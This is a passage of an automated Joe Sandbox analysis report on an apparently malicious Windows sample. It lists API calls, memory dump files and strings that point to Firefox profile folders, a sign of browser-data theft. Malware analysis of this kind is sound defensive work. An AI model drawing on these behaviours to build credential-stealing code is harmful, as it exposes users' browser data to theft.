                                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                            • String ID: 5$H$O$b$i$}$}
                                                            • API String ID: 1832431107-3760989150
                                                            APIs
                                                            • memset.MSVCRT ref: 0040FC6B
                                                            • memset.MSVCRT ref: 0040FC82
                                                              • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                                              • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                                              • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                                            • _mbscat.MSVCRT ref: 0040FCAD
                                                              • Part of subcall function 0041223F: memset.MSVCRT ref: 00412297
                                                              • Part of subcall function 0041223F: RegCloseKey.ADVAPI32(00000104,?,?,?,?,00000000,00000104), ref: 004122FE
                                                              • Part of subcall function 0041223F: _mbscpy.MSVCRT(00000000,?,?,?,?,?,00000000,00000104), ref: 0041230C
                                                            • _mbscat.MSVCRT ref: 0040FCD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.316874372348.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.316874372348.000000000041B000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscatmemset$CloseFolderPathSpecial_mbscpystrlen
                                                            • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                            • API String ID: 748118687-1174173950